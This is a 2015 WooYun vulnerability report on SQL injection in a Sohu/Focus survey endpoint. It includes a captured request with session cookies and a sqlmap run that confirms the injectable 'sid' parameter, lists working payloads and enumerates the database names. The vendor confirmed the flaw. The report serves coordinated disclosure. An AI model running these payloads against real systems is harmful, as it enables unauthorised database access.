当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115917

漏洞标题:搜狐某站SQL注入

相关厂商:搜狐

漏洞作者: 路人甲

提交时间:2015-05-24 21:04

修复时间:2015-07-09 00:08

公开时间:2015-07-09 00:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-24: 细节已通知厂商并且等待厂商处理中
2015-05-25: 厂商已经确认,细节仅向厂商公开
2015-06-04: 细节向核心白帽子及相关领域专家公开
2015-06-14: 细节向普通白帽子公开
2015-06-24: 细节向实习白帽子公开
2015-07-09: 细节向公众公开

简要描述:

第三弹!

详细说明:

求公仔漏洞第三弹(三)之搜狐某站SQL注入,
报名处,填写信息,抓包:

GET /Survey/submit?callback=jQuery203035808908636681736_1432457382472&sid=815&opts%5B2864%5D=asdasd&opts%5B2865%5D=asdasd&opts
%5B2866%5D=asdasda&opts%5B2867%5D=13311111111&opts%5B2868%5D%5B%5D=8607&_=1432457382473 HTTP/1.1
Host: appsurvey.focus.cn
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Referer: http://chanye.focus.cn/news/2015-04-30/6221522.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: webimid2="Bih7ngb1O/Z2FBHSojt3FTJEK8Z4JtBLcJSvtBN5nK/N6Tl1Ctri69dXZyhIZ/62FXa+kHlRCCU="; bjforumsaw67851912=2707; IPLOC=CN5100; 
SUV=1504021051181769; 
esf_recommend_unit_search=d7fddb5a18f2caf2b7684f6ee7dcea37YToyOntzOjc6ImNpdHlfaWQiO2k6MTtzOjEwOiJzZWFyY2hfY29uIjthOjE6e2k6MjthOjE6e3M6OToiaG91
c2VUeXBlIjthOjE6e3M6MjoiaW4iO2E6Mzp7aTowO2k6MjI7aToxO2k6MjA7aToyO2k6MjE7fX19fX0%3D; bjforumsaw=526%2C2707; lzstat_uv=10630109082488956093|
3428069; PHPSESSID=v7vg9811gk5s1rt9g4ofequlq1; _ga=GA1.2.1530492624.1427944125; lastdomain=1432647781|
ZGVhbGVyLWJhdDY5MjEwQHNvaHUuY29tfENDODdGMkM5NUEzQkM2M0Y5RkMzQUIwOUVDNUE5NjYyQHFxLnNvaHUuY29tfA|sohu.com; __utmt=1; 
sohutag=8HsmeSc5NCwmcyc5NCwmYjc5NCwmYSc5NCwmZjc5MiUsJ2cmOiAsJ24mOiAsJ2kmOiAsJ3cmOiAsJ2gmOiAsJ2NmOiAsJ2UmOiAsJ20mOiB9; 
__utma=1.1530492624.1427944125.1431101698.1432457112.6; __utmb=1.13.10.1432457112; __utmc=1; __utmz=1.1432457112.6.1.utmcsr=baidu|utmccn=
(organic)|utmcmd=organic|utmctr=site%3Achanye.focus.cn%20inurl%3A%3D%3D


QQ截图20150523235654.png


QQ截图20150524165759.png


漏洞证明:

[root@Hacker~]# Sqlmap Sqlmap -r E:\4.txt --dbs
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to o
[*] starting at 16:51:06
[16:51:06] [INFO] parsing HTTP request from 'E:\4.txt'
[16:51:07] [INFO] testing connection to the target URL
[16:51:07] [INFO] testing if the target URL is stable. This can take a couple of seconds
[16:51:08] [INFO] target URL is stable
[16:51:08] [INFO] testing if GET parameter 'callback' is dynamic
[16:51:08] [INFO] confirming that GET parameter 'callback' is dynamic
[16:51:08] [INFO] GET parameter 'callback' is dynamic
[16:51:08] [WARNING] heuristic (basic) test shows that GET parameter 'callback' might not be injectable
[16:51:08] [INFO] testing for SQL injection on GET parameter 'callback'
[16:51:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:51:08] [WARNING] reflective value(s) found and filtering out
[16:51:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[16:51:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[16:51:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[16:51:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[16:51:13] [INFO] testing 'MySQL inline queries'
[16:51:13] [INFO] testing 'PostgreSQL inline queries'
[16:51:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:51:13] [INFO] testing 'Oracle inline queries'
[16:51:13] [INFO] testing 'SQLite inline queries'
[16:51:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:51:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[16:51:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[16:51:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:51:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[16:51:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[16:51:18] [INFO] testing 'Oracle AND time-based blind'
[16:51:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[16:51:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:51:26] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it usi
[16:51:35] [WARNING] GET parameter 'callback' is not injectable
[16:51:35] [INFO] testing if GET parameter 'sid' is dynamic
[16:51:35] [INFO] confirming that GET parameter 'sid' is dynamic
[16:51:35] [INFO] GET parameter 'sid' is dynamic
[16:51:35] [INFO] heuristic (basic) test shows that GET parameter 'sid' might be injectable (possible DBMS: 'MySQL')
[16:51:35] [INFO] testing for SQL injection on GET parameter 'sid'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
[16:51:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:51:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:51:41] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[16:51:43] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
[16:51:44] [INFO] GET parameter 'sid' is 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable
[16:51:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[16:51:44] [INFO] GET parameter 'sid' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[16:51:44] [INFO] testing 'MySQL inline queries'
[16:51:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[16:51:55] [INFO] GET parameter 'sid' is 'MySQL > 5.0.11 stacked queries' injectable
[16:51:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[16:52:05] [INFO] GET parameter 'sid' is 'MySQL > 5.0.11 AND time-based blind' injectable
[16:52:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[16:52:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) techniq
[16:52:09] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[16:52:12] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[16:52:15] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[16:52:17] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[16:52:20] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[16:52:23] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[16:52:26] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[16:52:28] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[16:52:31] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
[16:52:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'sid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 446 HTTP(s) requests:
---
Place: GET
Parameter: sid
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: callback=jQuery203035808908636681736_1432457382472&sid=815 RLIKE IF(5132=5132,815,0x28)&opts[2864]=asdasd&opts[2865]=asdasd&opts
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: callback=jQuery203035808908636681736_1432457382472&sid=815 AND (SELECT 4934 FROM(SELECT COUNT(*),CONCAT(0x7165636671,(SELECT (CA
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: callback=jQuery203035808908636681736_1432457382472&sid=815; SELECT SLEEP(5)-- &opts[2864]=asdasd&opts[2865]=asdasd&opts[2866]=as
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: callback=jQuery203035808908636681736_1432457382472&sid=815 AND SLEEP(5)&opts[2864]=asdasd&opts[2865]=asdasd&opts[2866]=asdasda&o
---
[16:52:41] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[16:52:41] [INFO] fetching database names
[16:52:41] [INFO] the SQL query used returns 2 entries
[16:52:41] [INFO] retrieved: information_schema
[16:52:42] [INFO] retrieved: survey
available databases [2]:
[*] information_schema
[*] survey
[16:52:42] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 142 times
[16:52:42] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unha
[16:52:42] [INFO] fetched data logged to text files under 'F:\????\INJECT~1\SQLMAP~1.4\Bin\output\appsurvey.focus.cn'

修复方案:

搜狐的同学,求个公仔好吗?这是第三洞了~,求鼓励,喜欢你们家的公仔,thx :)

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-05-25 00:07

厂商回复:

感谢支持。
麻烦你提供下地址给你寄狐狸。

最新状态:

暂无